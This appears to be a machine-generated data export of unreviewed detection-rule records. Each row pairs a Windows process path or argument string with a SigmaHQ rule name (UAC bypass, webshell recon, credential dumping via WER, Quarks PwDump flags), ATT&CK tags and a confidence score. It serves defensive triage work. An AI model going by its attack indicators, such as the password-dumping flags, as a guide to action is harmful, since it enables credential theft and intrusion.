level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3949451b643e97d8db6d6e16,C:\Windows\System32\cmd.exe,C:\Windows\System32\cmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_mssql_susp_child_process.yml,Suspicious Child Process Of SQL Server,process_creation,"[""attack.t1505.003"", ""attack.t1190"", ""attack.initial-access"", ""attack.persistence"", ""attack.privilege-escalation""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e14930ee43c116a77f010899,C:\Windows\System32\control.exe,C:\Windows\System32\control.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml,Potentially Suspicious Rundll32 Activity,process_creation,"[""attack.defense-evasion"", ""attack.t1218.011""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 489ba87b1f87deb1eaaa47da,C:\Program Files\Amazon\SSM\ssm-document-worker.exe,C:\Program Files\Amazon\SSM\ssm-document-worker.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,Potential PowerShell Command Line Obfuscation,process_creation,"[""attack.execution"", ""attack.defense-evasion"", ""attack.t1027"", ""attack.t1059.001""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 714a6d7237e90dc8b7dab011,C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml,UAC Bypass Using Disk Cleanup,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1c7abe4705569f9022352a44,"""C:\Windows\system32\dism.exe"" /online /quiet /norestart /add-package /packagepath:""C:\Windows\system32\pe386"" /ignorecheck","""C:\Windows\system32\dism.exe"" /online /quiet /norestart /add-package /packagepath:""C:\Windows\system32\pe386"" /ignorecheck",bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml,UAC Bypass Using NTFS Reparse Point - Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1b3c26d0c96dd8f86431108f,:\$WINDOWS.~BT\Sources\SetupHost.exe,:\$WINDOWS.~BT\Sources\SetupHost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_non_interactive_execution.yml,Non Interactive PowerShell Process Spawned,process_creation,"[""attack.execution"", ""attack.t1059.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 66a76e51dc05f1a518a9f87a,Dbgview.exe,Dbgview.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml,Renamed SysInternals DebugView Execution,process_creation,"[""attack.resource-development"", ""attack.t1588.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 181a0093968053aad57b8d18,TeamViewer_Desktop.exe,TeamViewer_Desktop.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml,Remote Access Tool - Team Viewer Session Started On Windows Host,process_creation,"[""attack.persistence"", ""attack.initial-access"", ""attack.t1133""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 39a1836e69edc4ca7af904ca,TeamViewer_Service.exe,TeamViewer_Service.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml,Remote Access Tool - Team Viewer Session Started On Windows Host,process_creation,"[""attack.persistence"", ""attack.initial-access"", ""attack.t1133""]",windows,0.6,True,Sigma process_creation rule; status=test; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 14c30e94d12c84676ed1f48d,AutoIt.exe,AutoIt.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_autoit.yml,Renamed AutoIt Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 04b204691b42d6581f4943a1,AutoIt2.exe,AutoIt2.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_autoit.yml,Renamed AutoIt Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review aa0b1bc9687a3dbc6be58362,AutoIt3.exe,AutoIt3.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_autoit.yml,Renamed AutoIt Execution,process_creation,"[""attack.defense-evasion"", ""attack.t1027""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2090fc49a3ae257367479103,C:\Windows\System32\cmd.exe,C:\Windows\System32\cmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml,Scripting/CommandLine Process Spawned Regsvr32,process_creation,"[""attack.defense-evasion"", ""attack.t1218.010""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 59da3604169a617282ce6486,NirCmd.exe,NirCmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_nircmd.yml,Renamed NirCmd.EXE Execution,process_creation,"[""attack.execution"", ""attack.t1059"", ""attack.defense-evasion"", ""attack.t1202""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c6315eae88bcd364d75f2268,dllhost.exe,dllhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml,Dllhost.EXE Execution Anomaly,process_creation,"[""attack.privilege-escalation"", ""attack.defense-evasion"", ""attack.t1055""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 94f75fcc99e5221126016560,C:\Windows\System32\winlogon.exe,C:\Windows\System32\winlogon.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml,Wlrmdr.EXE Uncommon Argument Or Child Process,process_creation,"[""attack.defense-evasion"", ""attack.t1218""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b4b1557069a0b53af87eeaa5,C:\Program Files\Git\mingw64\bin\curl.exe,C:\Program Files\Git\mingw64\bin\curl.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_curl_susp_download.yml,Suspicious Curl.EXE Download,process_creation,"[""attack.command-and-control"", ""attack.t1105""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2aea6e9742f34b0b812b9e8c,C:\Program Files\Git\usr\bin\sh.exe,C:\Program Files\Git\usr\bin\sh.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_curl_susp_download.yml,Suspicious Curl.EXE Download,process_creation,"[""attack.command-and-control"", ""attack.t1105""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 99a2fa7d062166044e7d1322,TpmVscMgr.exe,TpmVscMgr.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_tpmvscmgr_add_virtual_smartcard.yml,New Virtual Smart Card Created Via TpmVscMgr.EXE,process_creation,"[""attack.execution""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1c4192a3b090bcafc0df2ed3,LODCTR.EXE,LODCTR.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_lodctr_performance_counter_tampering.yml,Rebuild Performance Counter Values Via Lodctr.EXE,process_creation,"[""attack.execution""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e965155a2f94f1c342b91a87,"""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s","""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s",bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml,UAC Bypass Using Windows Media Player - Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7800830383b1afede5d5a4c3,C:\Program Files\Windows Media Player\osk.exe,C:\Program Files\Windows Media Player\osk.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml,UAC Bypass Using Windows Media Player - Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 9b1aeef818a98c6e5394372a,C:\Windows\System32\cmd.exe,C:\Windows\System32\cmd.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml,UAC Bypass Using Windows Media Player - Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d0cfa3deb985407cb6eb0198,FINDSTR.EXE,FINDSTR.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml,Automated Collection Command Prompt,process_creation,"[""attack.collection"", ""attack.t1119"", ""attack.credential-access"", ""attack.t1552.001""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a980158e479c683bbe79d203,C:\Windows\SysWOW64\setup16.exe,C:\Windows\SysWOW64\setup16.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_setup16_custom_lst_execution.yml,Setup16.EXE Execution With Custom .Lst File,process_creation,"[""attack.privilege-escalation"", ""attack.persistence"", ""attack.defense-evasion"", ""attack.t1574.005""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review dc34680748b33614268b7040,C:\Windows\System32\conhost.exe,C:\Windows\System32\conhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_winrshost_command_execution.yml,Potential Lateral Movement via Windows Remote Shell,process_creation,"[""attack.lateral-movement"", ""attack.t1021.006""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cd5070d2771a81ca6576bb31,7z.exe,7z.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 650265dabefc811f113bb376,7za.exe,7za.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1a9340644c9ac71b7091d402,CONHOST.EXE,CONHOST.EXE,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 16aae777b7d0083a7ae0a00c,Cmd.Exe,Cmd.Exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 2e7a3b53d87df5f3b83ee6f4,InstallUtil.exe,InstallUtil.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ed76b05f86437925c96ac164,WinRAR.exe,WinRAR.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bcf376124b5e8599ea4f55e6,net.exe,net.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 360094c260950d1ff29b5fdb,net1.exe,net1.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bf3e32d79ad82899492c91b8,netsh.exe,netsh.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 033e7b9d20872b9792171ee0,wevtutil.exe,wevtutil.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_binary.yml,Potential Defense Evasion Via Binary Rename,process_creation,"[""attack.defense-evasion"", ""attack.t1036.003""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4a266863812341fc95a33827,popupwrapper.exe,popupwrapper.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_msix_ai_stub_execution.yml,Windows MSIX Package Support Framework AI_STUBS Execution,process_creation,"[""attack.defense-evasion"", ""attack.execution"", ""attack.t1218"", ""attack.t1553.005"", ""attack.t1204.002""]",windows,0.6,True,Sigma process_creation rule; status=experimental; level=low,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 85e568a6fdae06ed5d9c9c04,cscript.exe,cscript.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,Script Interpreter Execution From Suspicious Folder,process_creation,"[""attack.execution"", ""attack.t1059""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1a0be5c301a89ed3d68e6558,mshta.exe,mshta.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,Script Interpreter Execution From Suspicious Folder,process_creation,"[""attack.execution"", ""attack.t1059""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f4304950146405bea7819282,wscript.exe,wscript.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml,Script Interpreter Execution From Suspicious Folder,process_creation,"[""attack.execution"", ""attack.t1059""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8eb08ebb55960e874b6d4097,C:\Windows\System32\AppVClient.exe,C:\Windows\System32\AppVClient.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml,Mavinject Inject DLL Into Running Process,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1055.001"", ""attack.t1218.013""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bd1481df47d55dce4eb66eb8,net.exe,net.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml,Webshell Detection With Command Line Keywords,process_creation,"[""attack.persistence"", ""attack.discovery"", ""attack.t1505.003"", ""attack.t1018"", ""attack.t1033"", ""attack.t1087""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1ba3dc90f947a08582cddac2,net1.exe,net1.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml,Webshell Detection With Command Line Keywords,process_creation,"[""attack.persistence"", ""attack.discovery"", ""attack.t1505.003"", ""attack.t1018"", ""attack.t1033"", ""attack.t1087""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 40c1fbb4b75e5d373d3ee5aa,ping.exe,ping.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml,Webshell Detection With Command Line Keywords,process_creation,"[""attack.persistence"", ""attack.discovery"", ""attack.t1505.003"", ""attack.t1018"", ""attack.t1033"", ""attack.t1087""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fe7686dd40b82e5f2172a880,wmic.exe,wmic.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml,Webshell Detection With Command Line Keywords,process_creation,"[""attack.persistence"", ""attack.discovery"", ""attack.t1505.003"", ""attack.t1018"", ""attack.t1033"", ""attack.t1087""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4ab082a5b87606a450ad9195,C:\Windows\SysWOW64\svchost.exe,C:\Windows\SysWOW64\svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml,Suspicious Process Masquerading As SvcHost.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1036.005""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f49b14cd1fdc2a930a3b867c,C:\Windows\System32\svchost.exe,C:\Windows\System32\svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml,Suspicious Process Masquerading As SvcHost.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1036.005""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cff2af065da040f8e15a02ee,svchost.exe,svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_svchost_masqueraded_execution.yml,Suspicious Process Masquerading As SvcHost.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1036.005""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5a70be50f8b12ffcfe44cab7,BrowserCore.exe,BrowserCore.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_renamed_browsercore.yml,Renamed BrowserCore.EXE Execution,process_creation,"[""attack.credential-access"", ""attack.defense-evasion"", ""attack.t1528"", ""attack.t1036.003""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 29241dee5b0728cd5aded185,C:\Windows\System32\msiexec.exe,C:\Windows\System32\msiexec.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_powershell_snapins_hafnium.yml,Exchange PowerShell Snap-Ins Usage,process_creation,"[""attack.execution"", ""attack.t1059.001"", ""attack.collection"", ""attack.t1114""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5ca003a92c233523d0446a34,C:\Windows\System32\lsass.exe,C:\Windows\System32\lsass.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml,Potential Credential Dumping Via WER,process_creation,"[""attack.credential-access"", ""attack.t1003.001""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 431b270a18e7a568dc04277e,C:\Windows\System32\ComputerDefaults.exe,C:\Windows\System32\ComputerDefaults.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml,UAC Bypass Tools Using ComputerDefaults,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 42bc384fa4ee4d60e7df4a5d,sdelete.exe,sdelete.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml,Potential File Overwrite Via Sysinternals SDelete,process_creation,"[""attack.impact"", ""attack.t1485""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6cc6228ba88f18b582e0da49,C:\WINDOWS\System32\svchost.exe,C:\WINDOWS\System32\svchost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_schtasks_powershell_persistence.yml,Potential Persistence Via Powershell Search Order Hijacking - Task,process_creation,"[""attack.privilege-escalation"", ""attack.execution"", ""attack.persistence"", ""attack.t1053.005"", ""attack.t1059.001""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4bd180435b01aef4f8fc8a22,C:\Windows\System32\services.exe,C:\Windows\System32\services.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml,Always Install Elevated Windows Installer,process_creation,"[""attack.defense-evasion"", ""attack.privilege-escalation"", ""attack.t1548.002""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 40381a30bd8603d13240fe83,C:\ProgramData\chocolatey\choco.exe,C:\ProgramData\chocolatey\choco.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml,Dynamic .NET Compilation Via Csc.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1027.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fb670d1da54f8cd90ec0288c,C:\ProgramData\chocolatey\tools\shimgen.exe,C:\ProgramData\chocolatey\tools\shimgen.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml,Dynamic .NET Compilation Via Csc.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1027.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 836064cb1a562fdf16357bc5,C:\Windows\System32\inetsrv\w3wp.exe,C:\Windows\System32\inetsrv\w3wp.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml,Dynamic .NET Compilation Via Csc.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1027.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 006777575621a4b0bec3ac41,C:\Windows\System32\sdiagnhost.exe,C:\Windows\System32\sdiagnhost.exe,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml,Dynamic .NET Compilation Via Csc.EXE,process_creation,"[""attack.defense-evasion"", ""attack.t1027.004""]",windows,0.6,True,Sigma process_creation rule; status=test; level=medium,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ed147a12a361ccea5614e032,--dump-bitlocker,--dump-bitlocker,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml,HackTool - Quarks PwDump Execution,process_creation,"[""attack.credential-access"", ""attack.t1003.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review fa61eda8cc342e3455ef951b,--dump-hash-domain,--dump-hash-domain,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml,HackTool - Quarks PwDump Execution,process_creation,"[""attack.credential-access"", ""attack.t1003.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7e8efbdd8c766b3247a502cf,--dump-hash-domain-cached,--dump-hash-domain-cached,bad,bad,plain,suspicious,weak_rule,sigma,SigmaHQ/sigma,rules/windows/process_creation/proc_creation_win_hktl_quarks_pwdump.yml,HackTool - Quarks PwDump Execution,process_creation,"[""attack.credential-access"", ""attack.t1003.002""]",windows,0.7,True,Sigma process_creation rule; status=test; level=high,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 